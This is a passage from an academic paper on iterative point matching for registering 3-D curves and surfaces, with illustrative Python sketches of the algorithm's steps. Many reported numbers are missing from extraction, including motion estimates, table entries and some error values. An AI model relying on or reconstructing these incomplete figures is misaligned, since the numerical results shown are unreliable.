            //Assign this item's values to the various subviews
            imageItem.SetImageResource(item.Image);
            textTop.SetText(item.Name, TextView.BufferType.Normal);
            textBottom.SetText(item.Description, TextView.BufferType.Normal);

            //Finally return the view
            return view;
        }

        public Animal GetItemAtPosition(int position)
        {
            return items[position];
        }
    }
}

Oh, and here’s the Animal class if you’re curious:

namespace MonoDroid.CustomList
{
    public class Animal
    {
        public string Name { get; set; }
        public string Description { get; set; }
        public int Image { get; set; }
    }
}

Now for the sake of the demo, I create my own data inside the adapter, and of course nothing is stopping you from getting that data from a webservice, or somewhere more fashionable. The first thing to note is that I’m requiring an Activity object in the ctor. This really is only used to get the LayoutInflater for the given Activity so that we can inflate our row’s View later on, but it is important to have it. Next thing of interest is the overrides. All we really need to override is the Count property, and the GetItem, GetItemId, and GetView methods. The last method (GetItemAtPosition) is my own addition so that I can read out the object for a given position elsewhere in the project (in this case, when a ListView.ItemClicked event is fired). Count is easy, just return your object list’s count (duh). GetItem and GetItemId I’m still not convinced are necessary, but I override them anyways and just return the position in each case.
The only significance I know of so far with these properties is that in some ListView events, the item Id is passed as an event arg. However, in these same events, we also get the item’s position, which is why I have the GetItemAtPosition method, so I can retrieve the relevant object for the event. I’d love to hear from anyone who knows more about why I might want to pay more attention to the GetItem and GetItemId methods.

GetView is where the magic happens. Basically, I get the item for the given position first. Next, I determine if the convertView parameter is null or not, and inflate my CustomListItem’s layout into a usable View (LinearLayout to be specific). This is basically a way for us to reuse resources. Anyone familiar with MonoTouch and the Reusable UITableViewCell will feel right at home here. We could inflate the resource every time, but that would waste unnecessary resources. So, best practice here is to always reuse if the convertView is not null. Now then, with my LinearLayout instance, I can locate all of the views within that I want to assign information to, for the given row. As you can see in this case, I have an ImageView, and two TextView’s. Here is what the layout xml looks like for my custom list item:

<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:
    <ImageView android:
    <LinearLayout android:
        <TextView android:
        <TextView android:
    </LinearLayout>
</LinearLayout>

Once I have found references to these, I can set their text and image. Finally, I can return the LinearLayout View that I’ve been working on for this row. That wasn’t so hard, was it? Last, but not least, we need to actually deal with our Activity that holds the ListView. Up until now we had just created the adapter that our ListView was going to use. Now we need to actually hook an adapta’ up.
Here’s what my Activity code looks like:

using System;
using Android.App;
using Android.Content;
using Android.Runtime;
using Android.Views;
using Android.Widget;
using Android.OS;

namespace MonoDroid.CustomList
{
    [Activity(Label = "1 CustomList", MainLauncher = true)]
    public class CustomList : Activity
    {
        CustomListAdapter listAdapter;

        public CustomList(IntPtr handle)
            : base(handle)
        {
        }

        protected override void OnCreate(Bundle bundle)
        {
            base.OnCreate(bundle);

            //Set the Activity's view to our list layout
            SetContentView(Resource.layout.customlist);

            //Create our adapter
            listAdapter = new CustomListAdapter(this);

            //Find the listview reference
            var listView = FindViewById<ListView>(Resource.id.listView);

            //Hook up our adapter to our ListView
            listView.Adapter = listAdapter;

            //Wire up the click event
            listView.ItemClick += new EventHandler<ItemEventArgs>(listView_ItemClick);
        }

        void listView_ItemClick(object sender, ItemEventArgs e)
        {
            //Get our item from the list adapter
            var item = this.listAdapter.GetItemAtPosition(e.Position);

            //Make a toast with the item name just to show it was clicked
            Toast.MakeText(this, item.Name + " Clicked!", ToastLength.Short).Show();
        }
    }
}

Here’s the layout xml behind this activity:

<?xml version="1.0" encoding="utf-8"?>
<LinearLayout android:
    <ListView android:
</LinearLayout>

So you can see in my Activity’s OnCreate, I’m calling the base method (important), and then setting the activity’s content view to the layout xml that I showed you above. I’m also creating an instance of the CustomListAdapter I made earlier, and finding a reference to my ListView, so that I can set my ListView’s .Adapter property to the instance of the CustomListAdapter. As a bonus, I register the ItemClick event of my ListView, and in it, retrieve the item for the given position from my CustomListAdapter, using the method I added to the adapter (GetItemAtPosition). I then display a Toast with the name of the Animal clicked.
Hopefully this little tutorial enlightens you on how to make some fancy lists (not those boring default ones). I’ve also made the source code of the entire project available:
https://redth.codes/monodroid-custom-listadapter-for-your-listview/
CC-MAIN-2021-21
refinedweb
1,615
56.96
I have a script that runs fine from the command line, but when I run my setup.py script and then try to execute the .exe, it crashes as it can't import the first module. I have a setup script that looks something like this:

from distutils.core import setup
import py2exe
import sys

if len(sys.argv) == 1:
    sys.argv.append('py2exe')

setup(console = [{"script": "myprogram.py",
                  "dest_base": "myprogram_test",
                  "icon_resources": [(0, "myprogram.ico")]}],
      name = "myprogram_test",
      zipfile = None,
      options = {"py2exe": {"ignores": ['mx.DateTime', 'wx.BitmapFromImage'],
                            "compressed": 1,
                            "dll_excludes": ["w9xpopen.exe"],
                            "bundle_files": 3}})

The contents of myprogram.py look like this:

import sys
import os

from myobjs import objects as mobj

app = mobj.MyApplication()
app.MainLoop()

myobjs is a directory and has an __init__.py that is empty. I can run "myprogram.py" from the command line and everything works fine. When I run it as an exe, myprogram.exe always fails on the first import statement of the myobjs.objects module, regardless of which module is in this position. (ie. if 'traceback' is the first module, then it will fail on the statement "import traceback")

I checked the .\\build\bdist.win32\winexe\collect-2.5 directory, and the module where the failed import attempt occurred has been copied to this directory. If I change the setup script to use zipfile = "myprogram.zip" and, once generated, open this file using winzip, I can see the *.pyc file inside. (ie. the "traceback.pyc" file is in the zip)

So ... for some reason, when "myprogram" runs as an exe, it doesn't seem to be able to import modules from the executable or the zip file. I can work around this if I import, in myprogram.py, each module that is used in any submodule, and then the .exe works fine -- however, that becomes a maintenance headache with future versions.
It appears to me that the module lookup mechanism in the generated .exe somehow gets mangled. I have spent several hours building a "test" environment to try and reproduce the behaviour, and unfortunately, the simplified test .py works perfectly as both a .py and an .exe :-( So I know the problem is in my code somewhere, but I haven't got a clue where to start looking. Any help, assistance, or tips would be greatly appreciated. g.
http://sourceforge.net/p/py2exe/mailman/py2exe-users/?style=flat&viewmonth=200803&viewday=16
CC-MAIN-2015-27
refinedweb
401
69.58
This is a brief return to the topic of Irrational Sunflowers. The sunflower associated with a real number a is the set of points with polar coordinates r = √k and θ = 2πak, k = 1, 2, 3, …. A sunflower reduces to equally spaced rays if and only if a is a rational number: written in lowest terms as p/q, it produces q rays. Here is the sunflower of π of size 10000. Seven rays emanate from the center because π ≈ 22/7; then they become spirals, and the spirals rearrange themselves into 113 rays because π ≈ 355/113.

Counting these rays is boring, so here is a way to do this automatically with Python (+NumPy as np):

a = np.pi
n = 5000
x = np.mod(a*np.arange(n, 2*n), 1)
np.sum(np.diff(np.sort(x)) > 1/n)

This code computes the polar angles (as fractions of a full turn) of the sunflower points indexed n, …, 2n−1, sorts them, and counts the relatively large gaps between the sorted values. These correspond to the gaps between sunflower rays, except that one of the gaps gets lost when the circle is cut and straightened onto the interval [0, 1). So the program output (112) means there are 113 rays.

Here is the same sunflower with the points alternately colored red and blue. The colors blur into purple when the rational approximation pattern is strong. But they are clearly seen in the transitional period from the 22/7 approximation to 355/113.

- How many points would we need to see the next rational approximation after 355/113?
- What will that approximation be?

Yes, 22/7 and 355/113 are among the convergents of the continued fraction of π. But so is 333/106, which I do not see in the sunflower. Are some convergents better than others?

Finally, the code I used to plot sunflowers.

import numpy as np
import matplotlib.pyplot as plt

a = np.pi
k = np.arange(10000)
r = np.sqrt(k)
t = a*2*np.pi*k
plt.axes().set_aspect('equal')
plt.plot(r*np.cos(t), r*np.sin(t), '.')
plt.show()
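The ray-counting snippet above can be reproduced without NumPy; here is a pure-Python sketch of the same gap-counting idea (the function name is ours):

```python
import math

def count_rays(a=math.pi, n=5000):
    """Count visible rays in the sunflower of `a`, using points n..2n-1.

    Sort the fractional parts of a*k (the polar angles measured in turns)
    and count gaps larger than 1/n. One gap is lost where the circle is
    cut open, so the ray count is the gap count plus one.
    """
    x = sorted((a * k) % 1.0 for k in range(n, 2 * n))
    gaps = sum(1 for i in range(len(x) - 1) if x[i + 1] - x[i] > 1 / n)
    return gaps + 1
```

For a = π this reports 113 rays, matching the 112 gaps found by the NumPy version in the post; for a rational a = p/q in lowest terms it reports q rays.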
https://calculus7.org/2020/03/14/pi-and-python-how-22-7-morphs-into-355-113/
CC-MAIN-2021-04
refinedweb
319
68.67
The primary difference between these two programming languages is that C is a procedural programming language and does not support objects and classes, while C++ is a combination of object-oriented and procedural programming languages. In other words, it is often referred to as a hybrid language, as it is a superset of C and supports more features. Through this article, we aim to inform you about what the C++ language is, what the C language is, the fundamental differences between C and C++, and so forth. Read on to know more.

C and C++ Difference

What is C Language?

The C programming language can be defined as a middle-level language. It was the brainchild of Dennis Ritchie and was first developed in 1972 at Bell Labs. As C successfully combines the features and capabilities of a high-level language and a low-level language, it can be categorised as a middle-level language. C is a classical language used by programmers to develop portable applications and firmware. Though C was first developed with the intent of writing system software, it has transformed into an appropriate language for the development of firmware systems.

Code Example of C Program:

#include <stdio.h>

int main()
{
    int n1 = 10;
    int n2 = 25;
    int add = n1 + n2;
    printf("Sum = %i", add);
}

Output:

Sum = 35

Features of C Language

- This robust language comes packaged with a rich set of operators and built-in functions equipped for the development of any complex program.
- The C compiler combines the capabilities of a high-level language and assembly language.
- The programs written in C are quick and efficient, thanks to the presence of powerful operators and different data types.
- Highly portable, the programs written in the C language can be run on different machines with or without modifications.
- C programs can extend themselves.
- The programs written in the C language are a collection of functions that are ably supported by the C library.
Programmers can also create new functions to add to the C library. Today, C is the most widely used programming language for the development of operating systems and embedded systems.

What is C++ Language?

C++ is a popular computer programming language that combines the features of Simula67 and the C programming language. Simula67 was among the first object-oriented programming languages. Bjarne Stroustrup developed C++ in 1979. C++ introduced the concept of objects and classes. This intermediate or middle-level programming language is a combination of the features of high-level and low-level programming languages. Initially, C++ was referred to as "C with classes" because it showcased various features of the C language. In other words, when the C language gains the property of inheritance with classes, it becomes C++.

Code Example of C++ Program:

#include <iostream>
using namespace std;

int main()
{
    int a = 10;
    int b = 25;
    int sum = a + b;
    cout << "Sum = " << sum;
}

Output:

Sum = 35

Features of C++ language

- It is a compiled language that can be implemented on various platforms.
- C++ is object-oriented but also supports low-level memory manipulation.
- A key feature of C++ is its collection of predefined classes: data types that can be reused many times.
- C++ facilitates the declaration of user-defined classes.
- Classes can contain member functions that implement the required functionality.
- Multiple objects of a class can be created to make use of the functions defined inside the class.

Overall, C++ is used by modern-day developers for its significant features of encapsulation, abstraction, polymorphism, etc.

Key Difference between C and C++

- C is a middle-level coding language developed at Bell Labs by Dennis Ritchie in 1972.
- C++ was developed in 1980 by Bjarne Stroustrup.
- C is well-suited for the development of portable applications and firmware.
- The concepts of objects and classes were first brought to C by C++; it is an effective combination of low-level and high-level language features.
- C is a procedure-oriented programming language.
- C++ is an object-oriented programming language.
- C offers support for pointers only, while C++ supports both pointers and references.
- Polymorphism is an essential property of C++ that is not present in C.

Conclusion:

We hope that you have attained a good idea of the basics of the C and C++ languages. The pointers related to C vs C++ and the above-mentioned comparative features will guide you in working with both programming languages. In case you have any other points of distinction between C and C++ that we may have missed, please let us know in the Comments section below.
https://www.stechies.com/differences-between-c-language-c-pp/
only take a minute to install via one simple command, and you will probably end up installing it at some point anyway.

Update 02/15/2019

Here is what I had to do to get it working in 2020.

- Download and install the Yousseb fork for Mac.
- Create a meld file somewhere on my path, with code from the comment by Levsa (pasted below).
- Make sure the file is still executable: sudo chmod a+x ~/bin/meld

Improved Script from Levsa:

#!/usr/bin/python
import sys
import os
import subprocess

MELDPATH = "/Applications/Meld.app"

userArgs = []
for arg in sys.argv[1:]:
    if arg.startswith('--output'):
        filename = arg.split('=')[1]
        newArg = '--output=' + os.path.abspath(filename)
    elif arg.startswith('-'):
        newArg = arg
    else:
        newArg = os.path.abspath(arg)
    userArgs.append(newArg)

argsArray = ['open', '-W', '-a', MELDPATH, '--args'] + userArgs
print(argsArray)
p = subprocess.call(argsArray)

Old Post:

Note: `brew install meld` will probably fail, but the error will show you the proper command to run. In February of 2016 for me that command was `brew install homebrew/gui/meld`; some people report that `brew install homebrew/x11/meld` worked for them. Just read the outputted message carefully. It will probably have to pull in a lot of dependencies so it might take a while, but it should work.

For some reason Homebrew did not work for me on my new Mac back in February of 2015, so I had to look for other options (hence the "Without Homebrew, MacPorts, or Think" part in the original title of this article). After some intense Googling, I came across this AWESOME fork of Meld. It is Meld packaged with all of the dependencies into a regular .dmg. Please make sure to visit the official project page – Meld for OSX.

Note: I am linking to the release tagged osx-v1; there have been other releases since then. Some of them did not work for all users, but the latest release (OSX – 3.15.2) is supposed to work. You might have to try a few releases to find the one that works for you.
The author of that package posts his updates in the comments sometimes, so be on the lookout for that. If all fails I recommend using version osx-v1, since it seems to work for most users.

As I said earlier, Meld.dmg "just worked" for me, except that it didn't work in the command line, and that is where I need it the most. I wrote the following script (in Python, since you already need it to run Meld) and placed it in my ~/bin folder (making sure to add ~/bin to my PATH, see below).

Note: There is a cleaner version posted in the comments that should work with 3 arguments, allowing you to use Meld as a merge tool. I have not tested it, but it looks like it should work, and it might be worth your time to try it first.

#!/usr/bin/python
import sys
import os
import subprocess

if len(sys.argv) > 1:
    left = os.path.abspath(sys.argv[1])
else:
    left = ""

if len(sys.argv) > 2:
    right = os.path.abspath(sys.argv[2])
else:
    right = ""

MELDPATH = "/Applications/Meld.app"
p = subprocess.call(['open', '-W', '-a', MELDPATH, '--args', left, right])

I then added that folder to my PATH via an export PATH=~/bin:$PATH entry in my .bashrc file, to make sure that the meld command got picked up in my terminal. You can reload your bash config via . ~/.bashrc or just restart the terminal. Type in meld and it should work.

I've been using it for a few weeks many months now, and have yet to run into any problems. So there you have it, a working Meld on Mac OS X Yosemite, without having to use any 3rd party tools.

- Updated February 13, 2016
- Updated homebrew instructions
- Updated Meld fork reference instructions

I had sporadic behavior on OS X 10.14 Mojave and found these commands fixed my problem.

rm -rf ~/.local/share/meld
rm -f ~/Library/Preferences/org.gnome.meld.plist
rm -rf "~/Library/Saved Application State/org.gnome.meld.savedState/"

From issue #70

thanks a lot! Quite a rookie problem, but I spent hours wondering why running meld doesn't run it! daaa, I need to name the script file meld for it to work!!
Meld can now be installed using: brew install homebrew/gui/meld

I was wondering, how can I use meld as a git diff tool? I have this added in my ~/.gitconfig file. Then git difftool -d will launch meld.

Guys, whenever you could, please test this release: It shouldn't require a wrapper script any longer. I haven't had the time to 100% clean the wrapper script, but it seems functional and is based on what you guys have suggested here. You can find the script in /Applications/Meld.app/Contents/MacOS/Meld after you have installed Meld. If you have suggestions or fixes that you'd like to add to it, I'd love to hear from you.

Alex, please add a link to the page if you could.

Done, thanks for the link back!

No, man. Thank you for maintaining this page. It's been awesome! The feedback on this page has been amazing and I would have honestly stopped at 1.8 (it pretty much fit the bill for what I needed) if it wasn't for the feedback on your page.

As of mid-February, yousseb has released a 3.15.2 version as a .dmg. Installs and runs just fine. Get the latest at:

Thanks, I've added a link to the latest release with a comment.

I just uploaded a new release to github. Please check and let me know if it still breaks.

Thanks, I am a bit short on time to re-install it and try it out right now, but I've added a link in the note for now, and will try to test it later. I've also changed the order of comments to make sure that this shows up first.
On a new mac, I was able to install meld with brew using: brew install homebrew/x11/meld

There is also a native build of meld for os x:

I made a version of the mapping, but one that detects options:

#!/usr/bin/python
import sys
import os
import subprocess

MELDPATH = "/Applications/Meld.app"

userArgs = []
for arg in sys.argv[1:]:
    if arg.startswith('--output'):
        filename = arg.split('=')[1]
        newArg = '--output=' + filename
    elif arg.startswith('-'):
        newArg = arg
    else:
        newArg = os.path.abspath(arg)
    userArgs.append(newArg)

argsArray = ['open', '-W', '-a', MELDPATH, '--args'] + userArgs
print(argsArray)
p = subprocess.call(argsArray)

Sorry about the formatting, the second line after else: is outside of the else block. With errors fixed:

A slightly modified version of this is now part of the wrapper script in release osx-8. Thanks.

… which means you can simply create a symlink in /usr/local/bin and use it super easily from the command-line, as well as a diff tool: For example, add it to your ~/.gitconfig file:

I am getting the following error after doing as the post says: LSOpenURLsWithRole() failed for the application /Applications/Meld.app with error -10810 Any ideas?

Me too! No idea how to solve it.

Are you using the alpha version or the latest?

latest. The only version I could get to work was the alpha version. Not sure what the later versions fix or add, but the alpha version does everything I need it to do.

Thanks for the offer, but alpha turns out to do the same…

Sorry – my mistake, it's not the alpha build that works, but the first build here:

Now it works! To be precise, now I had the meld error problem, but fixed it as described in the link above. Thanks a lot!

+1 with LSOpenURLsWithRole() failed for the application /Applications/Meld.app with error -10810. I couldn't get this to work with any but the initial alpha version of Meld.
I thought you might like to know there is a simpler way to invoke Meld via mergetool, without the need for any extra scripts:

[mergetool "meld"]
cmd = open -W -a Meld --args --diff `pwd`/$BASE `pwd`/$LOCAL --diff `pwd`/$BASE `pwd`/$REMOTE --auto-merge `pwd`/$LOCAL `pwd`/$BASE `pwd`/$REMOTE --output `pwd`/$MERGED

Note: the pwd should be in backticks to insert the full path. For some reason, open seems to use the context of the application rather than where you open it from.

Wow – the backticks didn't even show up! I wasn't expecting that. They should look like `pwd` but with backticks, if you know what I mean.

In fact scratch that, it's easier to just do:

cmd = open -W -a Meld --args --auto-merge $PWD/$LOCAL $PWD/$BASE $PWD/$REMOTE --output $PWD/$MERGED

Oops – didn't check this thread in a while. I also didn't notice that you couldn't report issues on my fork in github. I'll see how to enable that and get back to you guys in here.. I did test on multiple Macs with Yosemite, but I'd really like this fork to be useful. I hated meld on macports and it's about the best diff/merge tool I ever used. I'd like to spread it around.. 🙂

Thanks Youssef, Are you on Twitter? I would love to put your handle in the main post. I can also link to a website if you want. Let me know. Alex.

I just tried the .dmg version, but alas it does not run for me. I'd love to try and debug the beta, but there doesn't seem to be a way to make contact with Yousef. I'd actually gotten the MacPorts version of meld running under Quartz without X11 on my Mavericks system, but that was a year ago. It looks like I'm gonna have to refresh my understanding of the lore.

Try getting the older version. I think I might have used

Yes, the osx-v1 version does work. The later versions just crash. The error I get with osx-v3 is: 9/12/15 11:09:27.898 PM com.apple.launchd.peruser.501[228]: (org.gnome.meld.332320[38819]) Exited with code: 1

Nice find. I just recently moved to Mac, and Meld is my absolute favorite diff tool.
I got a bit of trouble running the Meld app, though. Perhaps someone can give me a clue? Meld won't run, and if I try running it from the terminal, I see the following.

Couldn't bind the translation domain. Some translations won't work. 'module' object has no attribute 'bind_textdomain_codeset' Cannot import: GTK+ cannot import name Gtk

Thanks! I should mention that the error is from OSX – 3.13.4 (beta build). I tried the first OSX build just now (Meld 1.8.6), and that version works on my Mac.

Thank you, I think that is the build that I used.

I am not a python guy and only a recent mac guy, so I'd like to add to the above comments with the following points: "chmod +x meld" This should now work if you're more of a noob like me.

The Python script that worked for me for both diff and merge, with the Meld Error fix, is as follows. Please check that the single and double quotes have not been botched by your text editor, and check that you have a double hyphen before "args".

With the steps outlined above, Meld still only runs from SourceTree when I run SourceTree using the command line tool (stree) or by double-clicking the executable from the SourceTree package contents. I guess this is a permissions thing but I haven't figured out why yet.

Figured it out… I just had to use the absolute path /usr/local/bin/meld in SourceTree preferences.

Son of a gun, this is so helpful! THANKS!!! I've been looking for such a solution for several months now! Youssef A. Abou-Kewik and you have changed my everyday life 😉

Thanks for the handy script! I updated it to handle more arguments so that it works for three-way merges:

Still does not work with some of the arguments meld can take, like -L or --help

Since I am not very fluent in python, I wrote mine in php

Hi Alex. I downloaded and configured the python bin file with success. However, when I try to run "meld" in the terminal I get a "meld error" message and the application cannot open.

Hi, Alex. I'm the author of the github repo for Meld for OSX.
Thanks for the nice words about the DMG build. I'll try to make sure that meld runs through the command line on Mac in the next builds. Have a good day.

Awesome, I'll be on the lookout for that 🙂

The fix for the Meld Error problem is the following link.

This method is not working for me. I have tried it. It is throwing a "Meld Error" with open console/terminate options. I have put the script in the ~/bin dir. But still not sure. If you know the fix please let me know.

Great find. Have looked for this for a while. I hacked the python script so it would work with three files, which is needed for merges in some source control packages to resolve conflicts. Thanks, -preston

Yes, I didn't get to that part, but it should be an easy fix.

nice script for dmg meld
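Pulling the thread's fixes together, the argument mapping that all the wrapper scripts above share can be sketched as a Python 3 function. The `build_args` name is mine, not from the post; the final `open -W -a` invocation is the one the scripts above use:

```python
import os

# Path where the Meld.app bundle from the DMG is assumed to live.
MELD_PATH = "/Applications/Meld.app"


def build_args(args):
    """Map meld's CLI arguments so relative paths survive `open`.

    `open` launches the app from its own working directory, so every
    path argument must be made absolute; flags are passed through,
    and --output=FILE gets its FILE part absolutized too.
    """
    mapped = []
    for arg in args:
        if arg.startswith("--output"):
            filename = arg.split("=", 1)[1]
            mapped.append("--output=" + os.path.abspath(filename))
        elif arg.startswith("-"):
            mapped.append(arg)
        else:
            mapped.append(os.path.abspath(arg))
    return mapped


# The real wrapper would then exec, roughly:
#   subprocess.call(["open", "-W", "-a", MELD_PATH, "--args"] + build_args(sys.argv[1:]))
# Here we just show the transformed argument list.
print(build_args(["--output=merged.txt", "-h", "left.txt"]))
```

Because only `build_args` does any work, the same logic drops straight into any of the scripts quoted in the comments.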
https://www.alexkras.com/how-to-run-meld-on-mac-os-x-yosemite-without-homebrew-macports-or-think/?replytocom=54343
Iterative Point Matching for Registration of Free-Form Curves and Surfaces

International Journal of Computer Vision, 13:2, (1994). 1994 Kluwer Academic Publishers, Boston. Manufactured in The Netherlands.

ZHENGYOU ZHANG
INRIA Sophia-Antipolis, 2004 route des Lucioles, BP 93, F Sophia-Antipolis Cedex, FRANCE
Received June 23, Revised March 4, sophia.inria.fr

Abstract.

1 Introduction

The work described in this paper was carried out in the context of autonomous vehicle navigation in rugged terrain based on vision. A single view is usually not sufficient for path planning and manipulation, and it is preferable to combine several views to produce a more credible interpretation. The objective of this work is to compute precisely the displacement of the vehicle between successive views in order to register different 3-D visual maps. A 3-D visual map can be a set of curves obtained by using either an edge-based stereovision system (Pollard et al. 1985; Robert and Faugeras 1991) or a range imaging sensor (Sampson 1987). It can also be a dense 3-D map either acquired by an active sensor (e.g., ERIM (Sampson 1987)), or reconstructed by a correlation-based stereovision system (Fua 1992), or obtained by fusing the two. The reader is referred to (Faugeras et al. 1992) for a quantitative and qualitative comparison of some area and feature-based stereo algorithms. The registration step is indispensable for the following reasons: better localize the mobile vehicle; eliminate errors introduced in stereo matching and reconstruction; and build a more global Digital Elevation Map (DEM) of the environment.

Geometric matching remains one of the bottlenecks in computer and robot vision, although progress has been made in recent years for some particular applications. There are two main applications: object recognition and visual navigation. The problem in object recognition is to match observed data to a prestored model representing different objects of interest. The problem in visual navigation is to match data observed in a dynamic scene at different instants in order to recover object motions and to interpret the scene. Registration for inspection/validation is also an important application of geometric matching (Menq et al. 1992). Besl and Jain (1985), and Chin and Dyer (1986) have made two excellent surveys of pre-1985 work on matching in object recognition. Besl (1988) surveys the current methods for geometric matching and geometric representations while emphasizing the latter. Most of the previous work focused on polyhedral objects; geometric primitives such as points, lines and planar patches were usually used. This is of course very limited compared with the real world we live in. Recently, curved objects have attracted the attention of many researchers in computer vision. This paper deals with objects represented by free-form curves and surfaces, i.e., arbitrary space shapes of the type found in practice. A free-form curve can be represented by a set of chained points. Several matching techniques for free-form curves have been proposed in the literature. In the first category of techniques, curvature extrema are detected and then used in matching (Bolles and Cain 1982). However, it is difficult to localize precisely curvature extrema (Walters 1987; Milios 1989), especially when the curves are smooth. Very small variations in the curves can change the number of curvature extrema and their positions on the curves. Thus, matching based on curvature extrema is highly sensitive to noise. In the second category, a curve is transformed into a sequence of local, rotationally and translationally invariant features (e.g., curvature and torsion).
The curve matching problem is then reduced to a 1-D string matching problem (Pavlidis 1980; Schwartz and Sharir 1987; Wolfson 1990; Gueziec and Ayache 1992). As more information is used, the methods in this category tend to be more robust than those in the first category. However, these methods are still subject to noise disturbance because they use arclength sampling of the curves to obtain point sets. The arclength itself is sensitive to noise.

A dense 3-D map is a set of 3-D points. We can divide the methods proposed in the literature for registering two dense 3-D maps in two categories (the reader is referred to Zhang (1991) for a more detailed review):

Primitive-based approach. A set of primitives are first extracted. A dense 3-D map can then be described by a graph, with primitives defining the nodes and geometric relations defining the links. The registration of two maps becomes the mapping of the two graphs: subgraph isomorphism. Some heuristics are usually introduced to reduce the complexity.

Surface-based approach. A 3-D map is considered as a surface, having the form (a Monge patch) x(x, y) = [x, y, z(x, y)]^T with (x, y) ∈ ℝ². The idea is to find the transformation by minimizing a criterion relating the distance between the two surfaces.

In the primitive-based approach, one often uses some differential properties invariant to rigid transformation, such as Gaussian curvature. The primitives often used are

1. special points (Goldgof et al. 1988; Hebert et al. 1989; Kweon and Kanade 1992), whose curvature is locally maximal and is bigger than a threshold.
2. contours. A contour can indicate where the elevation changes significantly, which is called a cliff in Rodríguez and Aggarwal (1989). It can also be a distance profile (Radack and Badler 1989), each point on which has the same distance to a common point. In certain specific cases, a contour can be a curve of a constant depth (Kamgar-Parsi et al. 1991).
3.
surface patches (Kehtarnavaz and Mohan 1989; Liang and Todhunter 1990). Each surface patch is classified into different categories according to the sign of the Gaussian and mean curvatures. This type of primitive is usually used in a limited scene, for example, a scene containing several objects to be recognized. In a natural scene, there will be so many surface patches that the mapping becomes impractical.

Among the surface-based methods, we find

1. a technique similar to correlation (Gennery 1989), applicable when the number of degrees of freedom of the transformation between two maps is reduced (2, for example).
2. a differential technique (Horn and Harris 1991), applicable when the motion between two views is very small or when we have a very good initial estimate of the motion, and when the data are not very noisy.
3. a technique based on the coherence and compatibility between two maps (Hebert et al. 1989; Kweon and Kanade 1992) (quantified by the distance between two surfaces). Szeliski (1988) proposed a similar technique by adding a smoothness constraint.

The main difference between the above two approaches resides in the information to be processed during the registration. The information used in the primitive-based approach is much more concise than in the surface-based approach, and is in general preferable. But in a natural environment, with the state of the art of the current methods, we cannot detect robustly and localize precisely primitives (Walters 1987; Milios 1989). The surface-based approach uses all available information. The large redundancy allows for a precise computation of the transformation between the two maps, but this approach usually requires some a priori knowledge of the transformation.

The primitive-based approach and the curve matching methods cited above exploit global matching criteria in the sense that they can deal with two sets of free-form curves and surfaces which differ by a large motion/transformation. This ability to deal with large motions is usually essential for applications to object recognition. In many other applications, for example, visual navigation, the motion between curves in successive frames is in general either small (because the maximum velocity of an object is limited and the sample frequency is high) or known within a reasonable precision (because a mobile vehicle is usually equipped with several instruments such as odometric and inertial systems which can provide such information). In the latter case, we can first apply the rough estimate of the motion to the first frame to produce an intermediate frame; then the motion between the intermediate frame and the second frame can be considered to be small. A surface-based method is attractive for such applications. This paper describes a method, similar to the third technique of the surface-based approach but much faster, to register two 3-D maps differing by a small motion. The key idea underlying our approach is the following. Given that the motion between two successive frames is small, a point in the first frame is close to the corresponding point in the second frame. By matching points in the first frame to their closest points in the second, we can find a motion that brings the two sets of points closer. Iteratively applying this procedure, the algorithm yields a better and better motion estimate. Recently, several pieces of independent work exploiting similar ideas have been published. They are Besl and McKay (1992); Chen and Medioni (1992); Menq et al. (1992); Champleboux et al. (1992). A detailed comparison between these methods and ours will be given in Section 8.
2 Problem Statement

A parametric 3-D (space) curve segment C is a vector function x : [a, b] → ℝ³, where a and b are scalars. In computer vision applications, the data of a space curve are usually available in the form of a set of chained 3-D points. If we know the type of the curve, we can obtain its description x by fitting, say, conics to the point data (Safaee-Rad et al. 1991; Taubin 1991). A parametric surface S is a vector function x : ℝ² → ℝ³. In computer vision applications, the data of a surface are usually available in the form of a set of 3-D points. If we know the type of the surface, we can obtain its description x by fitting, say, planes or quadratic surfaces to the point data (Faugeras and Hebert 1986; Taubin 1991). In this work, we shall use directly the chained points for curves and point sets for surfaces, i.e., we are interested in free-form shapes without regard to particular primitives. This is very appropriate for a non-structured environment. In the following, if not explicitly stated, the property that a curve is a set of chained points is not used, i.e., we shall treat curve data in the same way as surface data (a set of points). The word shape (𝒮) will refer to either curves or surfaces.

The points in the first 3-D map are noted by x_i (i = 1, ..., m), and those in the second map are noted by x'_j (j = 1, ..., n). These points are sampled from 𝒮 and 𝒮', where 𝒮 = C when curves are in consideration and 𝒮 = S when surfaces are in consideration. In the noise-free case, if 𝒮 and 𝒮' are registered by a transformation T, then the distance of a point on 𝒮, after applying T, to 𝒮' is zero, and the distance of a point on 𝒮', after applying the inverse of T, to 𝒮 should be zero, too. The objective of registration is to find the motion between the two frames, i.e., R for rotation and t for translation, such that the following criterion

\[
\mathcal{F}(\mathbf{R}, \mathbf{t}) = \frac{1}{\sum_{i=1}^{m} p_i} \sum_{i=1}^{m} p_i \, d^2(\mathbf{R}\mathbf{x}_i + \mathbf{t}, \mathcal{S}') + \frac{1}{\sum_{j=1}^{n} q_j} \sum_{j=1}^{n} q_j \, d^2(\mathbf{R}^T\mathbf{x}'_j - \mathbf{R}^T\mathbf{t}, \mathcal{S}) \tag{1}
\]
The objective of registration is to find the motion between the two frames, i.e., R for rotation and t for translation, such that the following criterion trt f'(r,t) 1 ~ Pi d2(rxi + t, S') -- ~im l Pi i=1 (I) 1 n -1- ~j=l qj "= qj d2(rrxj - Rrt' S) is minimized, where d(x, S) denotes the distance of the point x to S (to be defined below), and pi (resp. qj) takes value 1 if the point xi (resp. x}) can be 4 122 Zhang matched to a point on S t in the second flame (resp. S in the first frame) and takes value 0 otherwise. The minimum of ~(R, t) will be zero in the noise-free case. It is necessary to have the parameters pi and qj because some points are only visible from one point of view and some are outliers, as to be described in Section 8. The above criteria are symmetric in the sense that neither of the two frames prevails over the other. To economize computation, we shall only use the first part of the right hand side of Equation 1. In other words, the objective function to be minimized is m 1 Z Pi d2(rxi + t;, St). f'(r, t) -- ~i=1 Pi i=i The effect of this simplification is described in Section 7.3. However, the minimization of 5C(R, t) is very difficult not only because d(rxi -t- t, S t) is highly nonlinear (the corresponding point of xi on S' is not known beforehand) but also because Pi can take either 0 or 1 (an Integer Programming Problem). As said in the introduction, we follow a heuristic approach by assuming the motion between the two frames is small or approximately known. In the latter case, we can first apply the approximate estimate of the motion between the two frames to the first one to produce an intermediate flame; then the motion between the intermediate flame and the second frame can be considered to be small. Small depends essentially on the scene of interest. If the scene is dominated by a repetitive pattern, the motion should not be bigger than half of the pattern distance. 
